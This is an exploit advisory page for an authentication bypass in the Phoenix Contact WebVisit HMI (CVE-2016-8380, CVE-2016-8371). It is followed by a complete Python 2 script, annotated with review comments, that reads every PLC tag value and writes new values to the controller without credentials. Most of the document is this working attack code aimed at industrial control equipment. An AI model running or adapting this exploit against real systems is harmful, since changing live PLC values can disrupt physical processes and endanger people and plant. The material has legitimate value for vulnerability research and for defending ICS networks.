Phoenix Contact WebVisit 2985725 Authentication Bypass

2018.10.13
Credit: Deneut Tijl
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass
# Date: 2018-09-30
# Exploit Author: Deneut Tijl
# Vendor Homepage: www.phoenixcontact.com
# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
# Version: WebVisit (all versions)
# CVE : CVE-2016-8380, CVE-2016-8371
# Description
# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)
# Steps:
# * Get Project Name: http://<ip>/
# * Get list of tags: http://<ip>/<projectname>.tcr
# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe
# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)
# CVE-2016-8380-SetPLCValues.py
#! /usr/bin/env python

# NOTE(review): the listing was pasted with its line structure collapsed; the
# indentation below is reconstructed from statement order and is the most
# plausible reading -- confirm against the original file before relying on it.
# Python 2 only: urllib2, raw_input and the str request body are not Python 3.
#
# Defensive reading of this script: none of the four requests it makes carries
# credentials or a session, which is what the advisory header means by "even in
# case of a password protection". The only externally observable signature is
# plain HTTP traffic to '/', '/<project>.tcr', '/cgi-bin/ILRReadValues.exe' and
# '/cgi-bin/writeVal.exe'; the last of these changes a live PLC value. Exposure
# is therefore bounded by who can reach the HMI's web port at all.
import urllib2

# Target address; a hard-coded default is used when the prompt is left empty.
strIP = raw_input('Please enter an IP [192.168.1.200]: ')
if strIP == '':
    strIP = '192.168.1.200'

# Step 1: fetch the landing page. Only urllib2.HTTPError is handled; a URLError
# (host unreachable) is not caught and would end the script with a traceback.
try:
    URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
except urllib2.HTTPError:
    print('#### Critical Error with IP ' + strIP + ': no response')
    raw_input('Press Enter to exit')
    exit()

# The project name is scraped from a line containing 'ProjectName' by taking the
# text inside its VALUE="..." attribute; if several lines match, the last wins.
strProject = ''
for line in URLResponse.readlines():
    if 'ProjectName' in line:
        strProject = line.split('VALUE="')[1].split('"')[0]
if strProject == '':
    print('#### Error, no \'ProjectName\' found on the main page')
    raw_input('Press Enter to exit')
    exit()
print('---- Found project \'' + strProject + '\', retrieving list of tags')

# Step 2: <project>.tcr lists the tags. As parsed here, '#'-prefixed lines are
# headers, '#!-- N =' announces an expected count, and the tag name is the
# first ';'-separated field of every other non-empty line.
try:
    TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))
except urllib2.HTTPError:
    print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')
    raw_input('Press Enter to exit')
    exit()
arrTagList = []
for line in TagResponse.readlines():
    if line.startswith('#!-- N ='):
        intNumberOfTags = int(line.split('=')[1])
        print('---- There should be ' + str(intNumberOfTags) + ' tags:')
    if not line.startswith('#'):
        if not line.split(';')[0].strip() == '':
            arrTagList.append(line.split(';')[0].strip())
            print('-- '+line.split(';')[0].strip())
raw_input('Press Enter to query them all')

# Late imports, kept where the original placed them.
import os, urllib
# Constant argument chosen by platform; this only clears the terminal.
os.system('cls' if os.name == 'nt' else 'clear')

# Step 3: POST an XML-like body naming every tag to ILRReadValues.exe and read
# back the current values. Tag names are inserted into the body without escaping.
strPost = '<body>'
strPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'
strPost += '<item_list>'
for item in arrTagList:
    strPost += '<i><n>' + item + '</n></i>'
strPost += '</item_list></body>'
DataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()

# The reply is split on '<i>'; each item is expected to carry <n>name</n> and
# <v>value</v>. An item with <n> but no <v> would raise IndexError here.
arrData = []
for item in DataResponse.split('<i>'):
    if '<n>' in item:
        name = item.split('<n>')[1].split('</n>')[0]
        value = item.split('<v>')[1].split('</v>')[0]
        arrData.append((name,value))
print('----- Full list of tags and their values:')
i = 0
for item in arrData:
    i += 1
    print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])

# Step 4: optional write-back of one tag. The 1-based index typed at the prompt
# is used as-is (no range or integer validation). Leaving the value prompt
# empty re-sends the current value.
ans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')
if ans1 == '':
    exit()
strTag = arrData[int(ans1) - 1][0]
strVal = arrData[int(ans1) - 1][1]
ans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')
if ans2 == '':
    ans2 = strVal
# writeVal.exe takes '<tag>+<value>' in the query string; only the tag part is
# URL-encoded, the value is appended verbatim. Response body is discarded.
urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))

